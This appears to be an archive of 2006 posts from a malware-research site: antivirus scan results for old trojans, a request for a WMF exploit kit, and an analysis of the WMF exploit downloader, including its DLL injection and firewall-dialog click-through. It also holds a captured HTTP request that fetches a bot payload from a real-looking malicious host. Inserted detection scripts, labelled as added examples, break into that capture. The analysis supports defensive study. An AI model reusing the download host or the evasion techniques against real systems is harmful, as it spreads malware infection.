WARNING: This site contains samples of live malware. Use at your own risk.

Trojan.Win32.Kuang

For love of the old school and keeping it real I've run some older malware through some modern AV/MW detection software. Interesting results:

MD5: 4ea8483c238bdb7fb8daea13b0b61530
SHA1: 9991b460b4724334828c4dac6ca1d3eabb06df3e

AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found W95/Weird
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found Email-Flooder.Win32.Weirder (probable variant)
NOD32 Found nothing
Norman Virus Control

requests


Hey all, I've been pretty busy with the new baby, however I do have a request.

Anyone have a copy of the WMF construction kit?

Thanks :)

V.

Win32.Klone.b analysis

Just another downloader, fully reversed into C code. I picked it up a few days ago and sent it to AVs, so most of them have signatures by now:

MD5: ec9dfa116b8f41e3918ec45a26597495

AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found Klone
BitDefender Found GenPack:Trojan.Downloader.Galapoper.A
ClamAV Found nothing
Dr.Web Found Trojan.Galapoper
F-Prot Antivirus Found nothing
Fortinet Found W32/KlonePacked.B-tr
Kaspersky Anti-Virus Found Packed.Win32.Klone.b
NOD32 Found probably a variant of Win32/TrojanDownloader.Small.AVT (probable variant)

More wmf files


I have some wmf exploit files.

more win_wmf


Thanks to seville we have more wmf stuff. These go out to a site and download a new file.
Here are some pretty pictures:

So sdbot05b.jpg gets turned into command.pif

GET /sdbot05b.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: charmedmadgic.free.fr
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2006 05:24:45 GMT
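The capture above shows the pattern worth alerting on: a request for a `.jpg` whose response body is a Windows executable. The following is an added example, not code from the original post, that checks an HTTP request/response pair for exactly that mismatch. The request lines are taken from the capture; the response bodies are constructed for the example, since the original capture is cut off after the `Date:` header.

```python
"""
Added example: flag HTTP exchanges where the requested path looks like an
image but the response body starts with a PE ("MZ") header. The request is
the one from the capture above; both responses are constructed sample data.
"""
import re

IMAGE_EXTS = (".jpg", ".jpeg", ".gif", ".png", ".bmp")
PE_MAGIC = b"MZ"            # DOS stub magic at offset 0 of every PE file
JPEG_MAGIC = b"\xff\xd8\xff"  # what a real JPEG starts with

REQUEST_LINE = re.compile(rb"^GET\s+(\S+)\s+HTTP/1\.[01]\r?\n", re.M)
CONTENT_TYPE = re.compile(rb"^Content-Type:\s*([^\r\n;]+)", re.M | re.I)

# Request lines as they appear in the capture above.
SAMPLE_REQUEST = (
    b"GET /sdbot05b.jpg HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    b"Host: charmedmadgic.free.fr\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)

# Constructed response: the server claims image/jpeg, but the body is a PE stub.
SAMPLE_RESPONSE_PE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 02 Jan 2006 05:24:45 GMT\r\n"
    b"Content-Type: image/jpeg\r\n\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00This program cannot be run in DOS mode."
)

# Constructed benign response: a real JPEG header.
SAMPLE_RESPONSE_JPEG = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF"
)


def request_path(request: bytes) -> str:
    """Return the URL path from the GET request line, without query string."""
    m = REQUEST_LINE.search(request)
    if not m:
        raise ValueError("not an HTTP GET request")
    return m.group(1).decode("ascii", "replace").split("?")[0]


def declared_content_type(response: bytes) -> str:
    """Return the Content-Type the server declared, or '' if absent."""
    m = CONTENT_TYPE.search(response)
    return m.group(1).decode("ascii", "replace").strip().lower() if m else ""


def response_body(response: bytes) -> bytes:
    """Return the body following the first blank line; tolerate bare LF."""
    for sep in (b"\r\n\r\n", b"\n\n"):
        idx = response.find(sep)
        if idx != -1:
            return response[idx + len(sep):]
    return b""


def looks_like_disguised_pe(request: bytes, response: bytes) -> bool:
    """True when an image-named URL or image Content-Type delivers a PE file."""
    path = request_path(request).lower()
    body = response_body(response)
    claims_image = path.endswith(IMAGE_EXTS) or declared_content_type(response).startswith("image/")
    return claims_image and body.startswith(PE_MAGIC)


if __name__ == "__main__":
    for name, resp in (("PE", SAMPLE_RESPONSE_PE), ("JPEG", SAMPLE_RESPONSE_JPEG)):
        print(name, "disguised PE" if looks_like_disguised_pe(SAMPLE_REQUEST, resp) else "ok")
```

The check keys on the first bytes of the body rather than on the extension or `Content-Type` alone, because both of those are under the server's control; a proxy or IDS that only trusts the declared type would pass this download as an image.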

Welcome to the newest Offensive Computing member


We had a healthy baby boy born this morning at 6:57am so I'll probably not be posting much for a little while.

Have a happy new year!!

V.

random administration things


A couple of things:

To all my military / government visitors. I notice people visiting but not logging in. If you would like an account but don't want to go through the normal sign up process, or don't have a public email you can use, feel free to let me know and I'd be happy to set you up an account.

A general thing, the file upload is broken. I am working on fixing it but no luck so far. Basically when you go to upload a file and hit add you will see a bunch of errors. However if you scroll down and hit submit, it still uploads successfully regardless of the errors. People can also just email me and I will post for them / give credit. Zip everything and password protect it with "offensivecomputing" so it will send.

WMF original exploit files and analysis

These files make up the downloader from the original WMF exploit posted on Bugtraq. It is composed of two parts:

bumXXX.exe md5sum: FE3B1E317846E0F398AF27954DD09C93
tioXXX.dll md5sum: 2AE5ED3EDD6925D6117548CF1E9F3C52

tioXXX.dll is dropped by bumXXX.exe and used for DLL injection into spawned iexplore.exe for downloading additional components. It also tries to bypass firewalls by sending WM_LBUTTONDOWN/WM_LBUTTONUP messages to firewall confirmation dialog.

Also bumXXX.exe is packed with PE Compact. I just ran it and dumped its memory image, and fixed the IAT manually; the only PE Compact unpacker I found didn't work :/
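The two behaviours described above, a thread injected into a spawned iexplore.exe and mouse-button messages sent at a firewall confirmation dialog, are the kind of thing a sandbox API trace makes visible. As an added example (not part of the original analysis), here is a small heuristic that scans such a trace for those two patterns. The trace format, the window titles and the `target=` argument name are assumptions made up for this example; `WM_LBUTTONDOWN`/`WM_LBUTTONUP` are the real Win32 message ids.

```python
"""
Added example: scan a constructed sandbox API-call trace for (a) a remote
thread created in iexplore.exe and (b) WM_LBUTTONDOWN/WM_LBUTTONUP sent to a
window whose title looks like a firewall prompt. Trace format, window titles
and argument names are assumptions for this example.
"""
import re
from collections import defaultdict

WM_LBUTTONDOWN = 0x0201  # real Win32 message ids
WM_LBUTTONUP = 0x0202

# Assumed keywords in the title of a personal-firewall confirmation dialog.
FIREWALL_TITLE_HINTS = ("firewall", "security alert")

# Assumed trace line format: "<pid> <api>(name=value, name=value, ...)"
LINE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\((?P<args>.*)\)$")

# Constructed sample trace: pid 1234 shows both behaviours, pid 4321 only
# clicks in Notepad and should not be flagged.
SAMPLE_TRACE = r"""
1234 CreateProcessA(image="C:\Program Files\Internet Explorer\iexplore.exe")
1234 CreateRemoteThread(target="iexplore.exe", start="LoadLibraryA")
1234 SendMessageA(window="Windows Security Alert", msg=0x0201)
1234 SendMessageA(window="Windows Security Alert", msg=0x0202)
4321 SendMessageA(window="Untitled - Notepad", msg=0x0201)
""".strip().splitlines()


def parse_line(line):
    """Return (pid, api, {arg: value}) or None if the line is not a call."""
    m = LINE.match(line.strip())
    if not m:
        return None
    args = {}
    for part in m.group("args").split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            args[key.strip()] = value.strip().strip('"')
    return int(m.group("pid")), m.group("api"), args


def is_injection_into_browser(api, args):
    """Remote thread created in iexplore.exe (assumed 'target=' argument)."""
    return api == "CreateRemoteThread" and args.get("target", "").lower() == "iexplore.exe"


def is_dialog_click(api, args):
    """Synthetic left-click message aimed at a firewall-looking window."""
    if api not in ("SendMessageA", "SendMessageW", "PostMessageA", "PostMessageW"):
        return False
    msg = int(args.get("msg", "0"), 0)
    title = args.get("window", "").lower()
    return msg in (WM_LBUTTONDOWN, WM_LBUTTONUP) and any(h in title for h in FIREWALL_TITLE_HINTS)


def find_suspicious_pids(trace_lines):
    """Map each pid to the sorted list of behaviour tags it triggered."""
    hits = defaultdict(set)
    for line in trace_lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        pid, api, args = parsed
        if is_injection_into_browser(api, args):
            hits[pid].add("browser-injection")
        if is_dialog_click(api, args):
            hits[pid].add("dialog-clickthrough")
    return {pid: sorted(tags) for pid, tags in hits.items()}


if __name__ == "__main__":
    for pid, tags in find_suspicious_pids(SAMPLE_TRACE).items():
        print(pid, ", ".join(tags))
```

Either tag alone has benign explanations (accessibility tools send synthetic clicks; some installers inject into the browser), so the combination in one process, as in pid 1234 here, is the useful signal rather than either call by itself.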

100,000 Hits!


Sometime today we crossed the 100k hits mark!

Not bad for a couple of weeks time with only really 3 days being truly public.

Welcome to all the visitors.

Now how about contributing some analysis, signatures, etc. :)

V.

Should access to malware be:

Open and free to all
82% (154 votes)
restricted to a vetted list
17% (32 votes)
only available to A/V and badguys
1% (1 vote)
Total votes: 187